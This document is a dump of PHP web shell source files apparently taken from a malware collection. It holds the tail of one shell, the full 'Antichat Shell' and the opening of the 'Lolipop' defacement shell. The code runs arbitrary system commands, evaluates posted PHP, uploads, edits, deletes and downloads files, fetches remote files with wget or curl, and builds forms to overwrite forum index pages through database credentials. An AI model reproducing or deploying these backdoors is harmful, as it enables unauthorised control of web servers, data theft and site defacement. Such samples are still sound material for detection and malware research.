167 |   <td style="border: 1 solid #000000" bgcolor="677667" onmouseover="this.style.backgroundColor='#888888';" onmouseout="this.style.backgroundColor='#677667';">
168 |  <font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
169 | <a href="<?php echo $PHP_SELF."?mode=upload"?>" title="Upload file to server">./ upload file</a><br>
170 | </td>
171 |  </tr>
172 |  </table>
173 | </div>
174 | <br>
175 | <br>
176 | <br>
177 | <br>
178 | <br>
179 | <td bgcolor="555555" valign="top" >
180 | <center>
181 | <div style="margin-top: 5;">
182 | <table width="98%" cellpadding="1" cellspacing="0">
183 | <tr>
184 |   <td style="border: 1 solid #000000" bgcolor="555555" >
185 | <font size="1" face="verdana" color="#fcfcfc">
186 | <b><?php echo$head_text;?><b>
187 | <tr>
188 | <td colspan="3" bgcolor="#677667" style="border-left: 1 solid #000000" style="border-bottom: 1 solid #000000" style="border-right: 1 solid #000000">
189 | <font face="Verdana" size="2" color="#000000">
190 | <br>
191 | <?php
192 | 
193 | if (!empty($_GET['mode'])) {$mode = $_GET['mode'];}
194 | elseif (!empty($_POST['mode'])) {$mode = $_POST['mode'];}
195 | else {$mode = "shell";}
196 | 
197 | switch($mode) {
198 | 
199 | case "shell":
200 | $foot_stat="Current directory: <b><font color=#dcdcdc>[".getcwd()."]</font></b></tr>";
201 | $head_text="Shell:";
202 | chdir($dir);
203 | 
204 | function execute($com)
205 | {
206 | 
207 |  if (!empty($com))
208 |  {
209 |   if(function_exists('exec'))
210 |    {
211 |     exec($com,$arr);
212 |    echo implode('
213 | ',$arr);
214 |    }
215 |   elseif(function_exists('shell_exec'))
216 |    {
217 |     echo shell_exec($com);
218 |    }
219 |   elseif(function_exists('system'))
220 | {
221 |     echo system($com);
222 | }
223 |   elseif(function_exists('passthru'))
224 |    {
225 |     echo passthru($com);
226 |    }
227 | }
228 | 
229 | }
230 | if ($cmd){
231 | 
232 | if($sertype == "winda"){
233 | ob_start();
234 | execute($cmd);
235 | $buffer = "";
236 | $buffer = ob_get_contents();
237 | ob_end_clean();
238 | }
239 | else{
240 | ob_start();
241 | echo decode(execute($cmd));
242 | $buffer = "";
243 | $buffer = ob_get_contents();
244 | ob_end_clean();
245 | }
246 | if (trim($buffer)){
247 | echo "<center><table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\">Executed command: <b><font color=#dcdcdc>[$cmd]</font></b></form></td></tr></table></center><left><textarea cols=200 rows=40 style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\">";
248 | echo decode($buffer);
249 | echo "</textarea></center></div>";
250 | }
251 | }
252 | echo "<table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\">
253 | <form action=\"$REQUEST_URI\" method=\"POST\">
254 | <table><tr><td><font size=1 face=verdana color=000000>[".get_current_user()."@".$SERVER_NAME."]: </font><INPUT type=\"text\" name=\"cmd\" size=50 value=\"$cmd\" style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td></tr></table>
255 | <table><tr><td><font size=1 face=verdana color=000000>Current directory: </font><INPUT type=\"text\" name=\"dir\" size=50 value=\"";
256 | echo getcwd();
257 | echo "\"style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\">
258 | <INPUT type=\"submit\" value=\"Change directory =>\" id=input style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td></tr></table></form></td></tr></table>";
259 | break;
260 | case "phpcode":
261 | $head_text="PHP code execution:";
262 | echo "<center><table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\"><b>PHP code:</b></td></tr></table><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=200 rows=40 style=\"margin-left: 3; background-color: 555555; font-family: Tahoma; color: 000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></textarea><br><br>
263 | <input type=\"submit\" name=\"submit\" value=\"                                     Execute PHP code =>                                     \" id=input style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></form></center></div>";
264 | echo "<center><table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\"><center><b>Results of PHP execution:</b></center>";
265 | @eval(stripslashes($_POST['phpcode']));
266 | echo "</td></tr></table></center>";
267 | break;
268 | case "upload":
269 | echo"<table width=100%><tr><td style=\"border: 1 solid \"000000\" \"bgcolor=677667\"><font size=\"1\" face=\"verdana\" color=\"#000000\">
270 | <table>
271 | <font size=\"1\" face=\"verdana\" color=\"#000000\">
272 | <form enctype=\"multipart/form-data\" action=\"$self\" method=\"POST\">
273 | <input type=\"hidden\" name=\"mode\" value=\"upload\">
274 | <tr>
275 | <td><font size=\"1\" face=\"verdana\" color=\"#000000\">File:</font></td>
276 | <td><input size=\"48\" name=\"file\" type=\"file\" style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td>
277 | </tr>
278 | <tr>
279 | <td><font size=\"1\" face=\"verdana\" color=\"#000000\">Path:</font></td>
280 | <td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\" style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"><input type=\"submit\" value=\"Send\" style=\"margin-left: 3; background-color: #555555; font-family: Tahoma; color: #000000; font-size: 7pt; font-weight: none; border: 1px solid rgb(0,0,0)\"></td></tr></form></font></table></td></tr></table>";
281 | if (isset($_POST['path'])){
282 | $uploadfile = $_POST['path'].$_FILES['file']['name'];
283 | if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
284 | echo"<table width=100%><tr><td style=\"border: 1 solid \"000000\" bgcolor=\"888888\"><font size=\"1\" face=\"verdana\" color=\"#000000\">";
285 | if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
286 |     echo "File sucessfuly uploaded in to directory: <font color=ffffff>[$uploadfile]</font><br>";
287 |     echo "Name: <font color=ffffff>[".$_FILES['file']['name']. "]</font><br>";
288 |     echo "Size: <font color=ffffff>[" .$_FILES['file']['size']. "]</font> Bytes<br>";
289 | } else {
290 |     print "Couldn't to upload file. Information:<br>";
291 |     print_r($_FILES);
292 | }
293 | echo"</td></tr></table>";
294 | }
295 | break;
296 | }
297 | ?>
298 | 
299 |  </tr>
300 |   </td>
301 |  </tr>
302 | <tr>
303 |   <td style="border: 1 solid #000000" bgcolor="555555" >
304 | <font size="1" face="verdana" color="#000000"><?echo $foot_stat;?>
305 | <tr>
306 |   <td style="border: none bgcolor="555555">
307 | <font size="1" face="verdana" color="#fcfcfc">
308 | <br>
309 |  <tr>
310 | <tr>
311 |   <td style="border: none bgcolor="555555">
312 | <font size="1" face="verdana" color="#fcfcfc">
313 | <br>
314 |  </tr>
315 | </table>
316 | </div>
317 | </td>
318 | </tr>
319 | </table>
320 | <table width=950>
321 | <tr>
322 |   <td style="border: 1 solid #000000" bgcolor="677667" >
323 | <font size="1" face="verdana" color="#000000">
324 | <center>
325 | 
326 | <?php
327 | echo "-=[".$cshver." | Page generation time: <font color=#fcfcfc>[<b>".round(get_micro_time()-start_time,4). "</b>]</font> seconds.]=-";
328 | ?>
329 | 
330 |  </td>
331 |  </tr>
332 |  </table>
333 | </BODY>
334 | </HTML>


--------------------------------------------------------------------------------
/t/malware/7.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | session_start();
  3 | error_reporting(0);
  4 | set_time_limit(9999999);
  5 | $login='antichat';
  6 | $password='antichat';
  7 | $auth=1;
  8 | $version='version 1.5 by Grinay';
  9 | $msgnotice='';
 10 | $style='<STYLE>
 11 | BODY{
 12 |   background-color: #2B2F34;
 13 |   color: #C1C1C7;
 14 |   font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
 15 |   MARGIN-TOP: 0px;
 16 |   MARGIN-BOTTOM: 0px;
 17 |   MARGIN-LEFT: 0px;
 18 |   MARGIN-RIGHT: 0px;
 19 |   margin:0;
 20 |   padding:0;
 21 |   scrollbar-face-color: #336600;
 22 |   scrollbar-shadow-color: #333333;
 23 |   scrollbar-highlight-color: #333333;
 24 |   scrollbar-3dlight-color: #333333;
 25 |   scrollbar-darkshadow-color: #333333;
 26 |   scrollbar-track-color: #333333;
 27 |   scrollbar-arrow-color: #333333;
 28 | }
 29 | input{
 30 |   background-color: #336600;
 31 |   font-size: 8pt;
 32 |   color: #FFFFFF;
 33 |   font-family: Tahoma;
 34 |   border: 1 solid #666666;
 35 | }
 36 | select{
 37 |   background-color: #336600;
 38 |   font-size: 8pt;
 39 |   color: #FFFFFF;
 40 |   font-family: Tahoma;
 41 |   border: 1 solid #666666;
 42 | }
 43 | textarea{
 44 |   background-color: #333333;
 45 |   font-size: 8pt;
 46 |   color: #FFFFFF;
 47 |   font-family: Tahoma;
 48 |   border: 1 solid #666666;
 49 | }
 50 | a:link{
 51 |   
 52 |   color: #B9B9BD;
 53 |   text-decoration: none;
 54 |   font-size: 8pt;
 55 | }
 56 | a:visited{
 57 |   color: #B9B9BD;
 58 |   text-decoration: none;
 59 |   font-size: 8pt;
 60 | }
 61 | a:hover, a:active{
 62 |   width: 100%;
 63 |   background-color: #A8A8AD;
 64 |   
 65 | 
 66 |   color: #E7E7EB;
 67 |   text-decoration: none;
 68 |   font-size: 8pt;
 69 | }
 70 | td, th, p, li{
 71 |   font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
 72 |   border-color:black;
 73 | }
 74 | </style>';
 75 | $header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
 76 | $footer='</body></html>';
 77 | 
 78 | //error parser
 79 | $filext="File already exists.";
 80 | $uploadok="File was successfully uploaded.";
 81 | $dircrt="Dir is created.";
 82 | $dircrterr="Don't create dir.";
 83 | $dirnf="Dir not found.";
 84 | $empty="Directory not empty or access denide.";
 85 | $deletefileok="File deleted";
 86 | $deletedirok="Dir deleted";
 87 | //end error parser
 88 | 
 89 | //auth
 90 | if(@$_POST['action']=="exit")unset($_SESSION['an']);
 91 | if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
 92 | if(@$_SESSION['an']==0){
 93 | echo $header;
 94 | echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
 95 | echo $footer;
 96 | exit;}
 97 | //end auth
 98 | 
 99 | function createdir($dir){if(@mkdir($dir))echo $GLOBALS['dircrt']." "; else echo $GLOBALS['dircrterr']." ";}
100 | 
101 | 
102 | 
103 | if($_SESSION['action']=="")$_SESSION['action']="viewer";
104 | if(@$_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
105 | if(@$_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
106 | 
107 | $dir=chdir($dir);
108 | $dir=getcwd()."/";
109 | $dir=str_replace("\\","/",$dir);
110 | 
111 | 
112 | 
113 | 
114 | 
115 | 
116 | //crdir
117 | 
118 | 
119 | if(@$_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
120 |   
121 | //Current type OS
122 | if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $win=1; else $win=0;
123 | 
124 | 
125 | 
126 |  
127 |  
128 |  
129 | 
130 | //downloader
131 | if($action=="download"){ 
132 | header('Content-Length:'.filesize($file).'');
133 | header('Content-Type: application/octet-stream');
134 | header('Content-Disposition: attachment; filename="'.$file.'"');
135 | readfile($file);
136 | }
137 | //end downloader
138 | 
139 | //delete file
140 | if($action=="delete"){ 
141 | if(unlink($file)) $msgnotice.=$deletefileok;
142 | }
143 | //end delete
144 | 
145 | //delete dir
146 | if($action=="deletedir"){ 
147 | if(!rmdir($file)) $msgnotice.=$GLOBALS['empty'];else $msgnotice.=$deletedirok;
148 | 
149 | }
150 | //end delete
151 | ?>
152 | 
153 | <? echo $header;?> 
154 | <!--content-->
155 | <table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
156 | <table><tr>
157 | <td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
158 | <td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
159 | <td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
160 | <td><a href="#" onclick="document.reqs.action.value='upload'; document.reqs.submit();">| Upload</a></td>
161 | <td><a href="#" onclick="document.reqs.action.value='phpeval'; document.reqs.submit();">| Php Eval</a></td>
162 | <td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
163 | <td><a href="#" onclick="history.back();"> <-back |</a></td>
164 | <td><a href="#" onclick="history.forward();"> forward->|</a></td>
165 | 
166 | </tr></table></td></tr></table><br>
167 | <form name='reqs' method='POST'>
168 | <input name='action' type='hidden' value=''>
169 | <input name='dir' type='hidden' value=''>
170 | <input name='file' type='hidden' value=''>
171 | </form>
172 | <table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
173 | <tr><td width="100%" valign="top">
174 | <!--end one content-->
175 | <?php if(@$msgnotice!="") echo $msgnotice;?>
176 | <?
177 | 
178 | //shell
179 | function shell($cmd){
180 | if (!empty($cmd)){
181 |   $fp = popen($cmd,"r");
182 |   {
183 |     $result = "";
184 |     while(!feof($fp)){$result.=fread($fp,1024);}
185 |     pclose($fp);
186 |   }
187 |   $ret = $result;
188 |   $ret = convert_cyr_string($ret,"d","w");
189 | }
190 | return $ret;}
191 | 
192 | if($action=="shell"){
193 | echo "<form method=\"POST\">
194 | <input type=\"hidden\" name=\"action\" value=\"shell\">
195 | <textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
196 | <textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
197 | <input type=\"submit\" value=\"execute\"></form>";}
198 | //end shell
199 | 
200 | 
201 | //viewer FS
202 | function perms($file) 
203 | { 
204 |   $perms = fileperms($file);
205 |   if (($perms & 0xC000) == 0xC000) {$info = 's';} 
206 |   elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
207 |   elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
208 |   elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
209 |   elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
210 |   elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
211 |   elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
212 |   else {$info = 'u';}
213 |   $info .= (($perms & 0x0100) ? 'r' : '-');
214 |   $info .= (($perms & 0x0080) ? 'w' : '-');
215 |   $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
216 |   $info .= (($perms & 0x0020) ? 'r' : '-');
217 |   $info .= (($perms & 0x0010) ? 'w' : '-');
218 |   $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
219 |   $info .= (($perms & 0x0004) ? 'r' : '-');
220 |   $info .= (($perms & 0x0002) ? 'w' : '-');
221 |   $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
222 |   return $info;
223 | } 
224 | 
225 | function view_size($size)
226 | {
227 |  if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
228 |  elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
229 |  elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
230 |  else {$size = $size . " B";}
231 |  return $size;
232 | }
233 | 
234 | function scandire($dir){
235 | 
236 | 
237 | 		
238 | echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
239 | echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
240 | 
241 | if (is_dir($dir)) {
242 |     if (@$dh = opendir($dir)) {
243 |         while (($file = readdir($dh)) !== false) {
244 | 		  if(filetype($dir . $file)=="dir") $dire[]=$file;
245 | 		  if(filetype($dir . $file)=="file")$files[]=$file;
246 | 		}
247 | 		closedir($dh);
248 | 		@sort($dire);
249 | 		@sort($files);
250 | 
251 | 
252 | if ($GLOBALS['win']==1) {
253 | echo "<tr><td>Select drive:";
254 | for ($j=ord('C'); $j<=ord('Z'); $j++) 
255 |  if (@$dh = opendir(chr($j).":/"))
256 |  echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
257 |  echo "</td></tr>";
258 | }
259 | echo "<tr><td>OS: ".@php_uname()."</td></tr>
260 | <tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
261 | for($i=0;$i<count($dire);$i++) {
262 | $link=$dir.$dire[$i];
263 |   echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>';  
264 |   }
265 | for($i=0;$i<count($files);$i++) {
266 | $linkfile=$dir.$files[$i];
267 | echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
268 | <td>'.perms($linkfile).'</td>
269 | <td>
270 | <a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
271 | <a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a>
272 | <a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Delete this file">X</a></td>
273 | </tr>'; 
274 | }
275 | echo "</table>";
276 | }}}
277 | 
278 | if($action=="viewer"){
279 | scandire($dir);
280 | }
281 | //end viewer FS
282 | 
283 | //editros
284 | if($action=="editor"){  
285 |   function writef($file,$data){
286 |   $fp = fopen($file,"w+");
287 |   fwrite($fp,$data);
288 |   fclose($fp);
289 |   }
290 |   function readf($file){
291 |   if(!$le = fopen($file, "r")) $contents="Can't open file, permission denide"; else {
292 |   $contents = fread($le, filesize($file));
293 |   fclose($le);}
294 |   return htmlspecialchars($contents);
295 |   }
296 | if(@$_POST['save'])writef($file,$_POST['data']);
297 | echo "<form method=\"POST\">
298 | <input type=\"hidden\" name=\"action\" value=\"editor\">
299 | <input type=\"hidden\" name=\"file\" value=\"".$file."\">
300 | <textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
301 | <input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
302 | }
303 | //end editors
304 | 
305 | //upload
306 | if($action=="upload"){
307 |   if(@$_POST['dirupload']!="") $dirupload=$_POST['dirupload'];else $dirupload=$dir;
308 |   $form_win="<tr><td><form method=POST enctype=multipart/form-data>Upload to dir:<input type=text name=dirupload value=\"".$dirupload."\" size=50></tr></td><tr><td>New file name:<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload local file'></td></tr>";
309 |   if($GLOBALS['win']==1)echo $form_win;
310 |   if($GLOBALS['win']==0){
311 |     echo $form_win;
312 | 	echo '<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
313 | <input type=submit name=upload value=Upload></form></td></tr>';	
314 | }
315 | 
316 | if(@$_POST['uploadloc']){
317 | if(@$_POST['filename']=="") $uploadfile = $dirupload.basename($_FILES['file']['name']); else 
318 | $uploadfile = $dirupload."/".$_POST['filename'];
319 | 
320 | if(!file_exists($dirupload)){createdir($dirupload);}
321 | if(file_exists($uploadfile))echo $GLOBALS['filext']; 
322 | elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) 
323 | echo $GLOBALS['uploadok'];
324 | }
325 | 
326 | if(@$_POST['upload']){
327 |     if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
328 | 	switch($_POST['with'])
329 | 	{
330 | 	  case wget:
331 | 	  shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");
332 | 	  break;
333 |  	  case fetch:
334 |  	  shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");
335 |  	  break;
336 |  	  case lynx:
337 |  	  shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");
338 |  	  break;
339 |  	  case links:
340 |  	  shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");
341 |  	  break;
342 |  	  case GET:
343 |  	  shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");
344 |  	  break;
345 |  	  case curl:
346 |  	  shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");
347 |  	  break;
348 | 	 }
349 | 	}
350 |   
351 | }
352 | //end upload section
353 | 
354 | 
355 | if($action=="phpeval"){
356 |  echo "
357 | <form method=\"POST\">
358 |  <input type=\"hidden\" name=\"action\" value=\"phpheval\">
359 |  &lt;?php<br>
360 | <textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
361 | ?><br>
362 | <input type=\"submit\" value=\"execute\"></form>";} 
363 | if(@$_POST['phpev']!=""){echo eval($_POST['phpev']);}
364 | ?>
365 | </td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
366 | <? echo $footer;?>


--------------------------------------------------------------------------------
/t/malware/55.php:
--------------------------------------------------------------------------------
  1 | <p align="right"></p><body bgcolor="#FFFFFF"> 
  2 | <?php 
  3 | 
  4 | ######################## Begining of Coding ;) ###################### 
  5 | error_reporting(0); 
  6 | 
  7 |     $info = $_SERVER['SERVER_SOFTWARE']; 
  8 |     $site = getenv("HTTP_HOST"); 
  9 |     $page = $_SERVER['SCRIPT_NAME']; 
 10 |     $sname = $_SERVER['SERVER_NAME']; 
 11 |     $uname = php_uname(); 
 12 |     $smod = ini_get('safe_mode'); 
 13 |     $disfunc = ini_get('disable_functions'); 
 14 |     $yourip = $_SERVER['REMOTE_ADDR']; 
 15 |     $serverip = $_SERVER['SERVER_ADDR']; 
 16 |     $version = phpversion(); 
 17 |     $ccc = realpath($_GET['chdir'])."/"; 
 18 |     $fdel = $_GET['fdel']; 
 19 |     $execute = $_POST['execute']; 
 20 |     $cmd = $_POST['cmd']; 
 21 |     $commander = $_POST['commander']; 
 22 |     $ls = "ls -la"; 
 23 |     $source = $_POST['source']; 
 24 |     $gomkf = $_POST['gomkf']; 
 25 |     $title = $_POST['title']; 
 26 |     $sourcego = $_POST['sourcego']; 
 27 |     $ftemp = "tmp"; 
 28 |     $temp = tempnam($ftemp, "cx"); 
 29 |     $fcopy = $_POST['fcopy']; 
 30 |     $tuser = $_POST['tuser']; 
 31 |     $user = $_POST['user']; 
 32 |     $wdir = $_POST['wdir']; 
 33 |     $tdir = $_POST['tdir']; 
 34 |     $symgo = $_POST['symgo']; 
 35 |     $sym = "xhackers.txt"; 
 36 |     $to = $_POST['to']; 
 37 |     $sbjct = $_POST['sbjct']; 
 38 |     $msg = $_POST['msg']; 
 39 |     $header = "From:".$_POST['header']; 
 40 | 
 41 | 
 42 | //PHPinfo 
 43 | 
 44 | if(isset($_POST['phpinfo'])) 
 45 | { 
 46 |     die(phpinfo()); 
 47 | } 
 48 | //Guvenli mod vs vs 
 49 | if ($smod) 
 50 | { 
 51 |     $c_h = "<font color=red face='Verdana' size='1'>ON</font>"; 
 52 | } 
 53 | else 
 54 | { 
 55 |     $c_h = "<font face='Verdana' size='1' color=green>OFF</font>"; 
 56 | } 
 57 | 
 58 | //Kapali Fonksiyonlar 
 59 | if (''==($disfunc)) 
 60 | { 
 61 |     $dis = "<font color=green>None</font>"; 
 62 | } 
 63 | else 
 64 | { 
 65 |     $dis = "<font color=red>$disfunc</font>"; 
 66 | } 
 67 | //Dizin degisimi 
 68 | if(isset($_GET['dir']) && is_dir($_GET['dir'])) 
 69 | { 
 70 |  chdir($_GET['dir']); 
 71 | } 
 72 | 
 73 | $ccc = realpath($_GET['chdir'])."/"; 
 74 | 
 75 | //Baslik 
 76 | echo "<head> 
 77 | <style> 
 78 | body { font-size: 12px; 
 79 | 
 80 |            font-family: arial, helvetica; 
 81 | 
 82 |             scrollbar-width: 5; 
 83 | 
 84 |             scrollbar-height: 5; 
 85 | 
 86 |             scrollbar-face-color: black; 
 87 | 
 88 |             scrollbar-shadow-color: silver; 
 89 | 
 90 |             scrollbar-highlight-color: silver; 
 91 | 
 92 |             scrollbar-3dlight-color:silver; 
 93 | 
 94 |             scrollbar-darkshadow-color: silver; 
 95 | 
 96 |             scrollbar-track-color: black; 
 97 | 
 98 |             scrollbar-arrow-color: silver; 
 99 | 
100 |     } 
101 | </style> 
102 | 
103 | <title>Lolipop.php - Edited By KingDefacer - [$site]</title></head>"; 
104 | //Ana tablo 
105 | echo "<body text='#FFFFFF'> 
106 | <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> 
107 |     <tr> 
108 |         <td><font color='#000000'> 
109 | 
110 | 
111 |           <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> 
112 | 
113 |     </tr> 
114 |     <tr> 
115 |         <td  style='border: 1px solid #333333'> 
116 |         <font face='Verdana' size='1' color='#000000'>Site: <u>$site</u><br>Server name: <u>$sname</u><br>Software: <u>$info</u><br>Version : <u>$version</u><br>Uname -a: <u>$uname</u><br>Path: <u>$ccc</u><br>Safemode: <u>$c_h</u><br>Disable Functions: <u>$dis</u><br>Page: <u>$page</u><br>Your IP: <u>$yourip</u><br>Server IP: <u><a href='http://whois.domaintools.com/".$serverip."'>$serverip</a></u></font></td>  
117 |     </tr> 
118 | </table>"; 
119 | echo '<td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font>    </tr> 
120 | '; 
121 | //Buton Listesi 
122 | echo "<center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value='  phpBB HACK.  '><input type=submit name=smf value='  SMF HACK.  '></form></center>"; 
123 | 
124 | 
125 | 
126 | 
127 | //VB HACK 
128 | if (isset($_POST['vbulletin'])) 
129 | { 
130 | echo "<center><table border=0 width='100%'> 
131 | <tr><td> 
132 | <center><font face='Arial' color='#000000'>==Lolipop VB index.==</font></center> 
133 |     <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=dbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
134 |           <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=dbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
135 |           <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=dbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
136 | 		  
137 |           <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=dbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
138 |           <font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=index rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br> 
139 |           <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>"; 
140 | die(); 
141 | } 
142 | $KingDefacer="Powered By Lolipop :))"; 
143 | $dbh = $_POST['dbh']; 
144 | $dbu = $_POST['dbu']; 
145 | $dbn = $_POST['dbn']; 
146 | $dbp = $_POST['dbp']; 
147 | $index = $_POST['index']; 
